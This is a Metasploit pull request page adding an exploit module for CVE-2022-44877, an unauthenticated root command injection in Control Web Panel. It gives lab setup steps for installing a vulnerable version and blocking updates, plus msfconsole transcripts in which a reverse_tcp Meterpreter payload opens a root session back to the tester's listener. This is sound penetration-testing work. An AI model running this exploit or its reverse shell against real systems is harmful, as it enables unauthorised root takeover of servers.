metasploit-framework icon indicating copy to clipboard operation
metasploit-framework copied to clipboard

Published 20 hours ago verified publisher icon rapid7

Add exploit for CVE-2022-44877

Open zeroSteiner opened this issue 2 years ago • 2 comments

This adds an exploit for CVE-2022-44877 which is an unauthenticated command injection in Control Web Panel <0.9.8.1147. Successful exploitation results in code execution as the root user.

Control Web Panel updates automatically roughly every hour, but the steps in the module docs patch the installation script to downgrade and not update. This is being actively exploited so folks must be disabling updates in the wild.

Verification

  • [ ] Start with a fresh instance of CentOS and run the following commands, modified from the original:
    • [ ] yum -y install wget
    • [ ] yum -y update
    • [ ] reboot
    • [ ] cd /usr/local/src
    • [ ] wget https://centos-webpanel.com/cwp-el7-latest
    • [ ] sed -i 's/0\.9\.8\.[0-9]\+/0.9.8.1146/g' cwp-el7-latest
    • [ ] sed -i 's/^\(sh \/scripts\/update_cwp\)/# \1/g' cwp-el7-latest
    • [ ] sh cwp-el7-latest
    • [ ] sed -i '1i exit 0' /usr/local/cwpsrv/htdocs/resources/scripts/update_cwp
  • [ ] Start Metasploit
  • [ ] Run: control_web_panel_login_cmd_exec
  • [ ] Set RHOST and LHOST
  • [ ] Run the exploit, see that a session is opened

Example

msf6 > use exploit/linux/http/control_web_panel_login_cmd_exec
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/control_web_panel_login_cmd_exec) > set RHOSTS 192.168.159.9
RHOSTS => 192.168.159.9
msf6 exploit(linux/http/control_web_panel_login_cmd_exec) > set TARGET Unix\ Command
TARGET => Unix Command
msf6 exploit(linux/http/control_web_panel_login_cmd_exec) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/control_web_panel_login_cmd_exec) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(linux/http/control_web_panel_login_cmd_exec) > check
[*] 192.168.159.9:2031 - The target appears to be vulnerable. Successfully tested command injection.
msf6 exploit(linux/http/control_web_panel_login_cmd_exec) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (24380 bytes) to 192.168.159.9
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.9:36154) at 2023-01-19 16:05:42 -0500
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux 3.10.0-1160.81.1.el7.x86_64 #1 SMP Fri Dec 16 17:29:43 UTC 2022
Architecture : x64
Meterpreter  : python/linux
meterpreter >

zeroSteiner avatar Jan 19 '23 22:01 zeroSteiner

:bow: By end of week as promised, proper doc'd. Big ups @smcintyre-r7 :smile:

sempervictus avatar Jan 19 '23 23:01 sempervictus

It looks like my solution to disable automatic updates is incomplete. Per this AttackerKB post:

After running the installation script which takes about 30 minutes, please rename /usr/local/cwpsrv/htdocs/resources/scripts/update_cwp to update_cwp.something otherwise CWP will get updated to the latest version when you start the application.

zeroSteiner avatar Jan 20 '23 17:01 zeroSteiner

I ran the exploit:

msf6 exploit(linux/http/control_web_panel_login_cmd_exec) > run rhost=192.168.123.132

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
init with version SSLv23
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
init with version SSLv23
[*] Sending stage (24380 bytes) to 192.168.123.132
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.132:59340) at 2023-01-31 13:51:05 +0000


meterpreter >

Check looks good

msf6 exploit(linux/http/control_web_panel_login_cmd_exec) > check rhost=192.168.123.132
init with version SSLv23
[*] 192.168.123.132:2031 - The target appears to be vulnerable. Successfully tested command injection.

adfoster-r7 avatar Jan 31 '23 13:01 adfoster-r7

Release Notes

Adds an exploit for CVE-2022-44877 which is an unauthenticated command injection in CentOS Control Web Panel <0.9.8.1147. Successful exploitation results in code execution as the root user.

adfoster-r7 avatar Jan 31 '23 14:01 adfoster-r7

It looks like my solution to disable automatic updates is incomplete. Per this AttackerKB post:

After running the installation script which takes about 30 minutes, please rename /usr/local/cwpsrv/htdocs/resources/scripts/update_cwp to update_cwp.something otherwise CWP will get updated to the latest version when you start the application.

Some workaround on disabling CWP's auto update to version 0.9.8.1150, which happens to me within like every 20 mins or so. Been running it for almost 4 hours with testing, and still looks gud

sudo su

cd /usr/local/cwpsrv/htdocs/resources/admin/include
mv cron.php cron.php.bak
mv cron_php_autoupdate.php cron_php_autoupdate.php.bak
mv autoupdate_3rdparty.php autoupdate_3rdparty.php.bak

cd /scripts
mv update_cwp update_cwp.bak
mv update_ioncube update_ioncube.bak
mv cwp_update_all cwp_update_all.bak
mv cwp_update_admin cwp_update_admin.bak

monsieurDuke avatar Feb 18 '23 06:02 monsieurDuke